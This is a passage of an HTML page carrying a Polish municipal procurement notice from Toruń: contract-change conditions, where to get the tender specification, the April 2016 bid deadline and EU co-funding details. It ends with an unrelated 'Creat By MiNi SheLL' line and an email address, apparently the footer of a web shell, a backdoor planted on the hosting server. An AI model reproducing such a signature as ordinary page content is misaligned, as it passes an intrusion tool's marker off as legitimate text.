c) w przypadku, gdy nastąpi przerwanie prac objętych przedmiotem umowy na czas realizacji prac dodatkowych nie objętych zamówieniem podstawowym w ramach odrębnych zamówień dodatkowych lub uzupełniających,
d) z innych przyczyn leżących po stronie Zamawiającego,
4)  jeżeli zmiana umowy dotyczyć będzie zakresu przedmiotu umowy, w szczególności jego ograniczenia i wynikać będzie z konieczności wprowadzenia ewentualnych opracowań dodatkowych lub zamiennych, wskazanych do wykonania na podstawie odrębnych umów, z ewentualną korektą wynagrodzenia ustaloną na podstawie negocjacji stron, 
5)  jeżeli zmiana umowy dotyczyć będzie zmiany osób wymienionych w § 6 wzoru umowy, z przyczyn niezależnych od obu stron,
6)  jeżeli zmiana umowy dotyczyć będzie zmiany terminu określonego w  §  1  ust. 6  pkt 4 i 5 oraz w § 10 ust. 3 wzoru umowy, z przyczyn niezależnych od obu stron.
4.  Do każdej propozycji zmiany, inicjujący zmianę przedstawi: 
- opis propozycji zmiany, w tym wpływ na terminy wykonania,
- uzasadnienie zmiany,
- obliczenia uzasadniające ewentualną zmianę wynagrodzenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Środowiska i Zieleni, ul. Wały gen. Sikorskiego 12, Toruń - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2016 godzina 11:00, miejsce: Wydział Środowiska i Zieleni, ul. Wały gen. Sikorskiego 12, Toruń - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany z Funduszy Europejskich w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com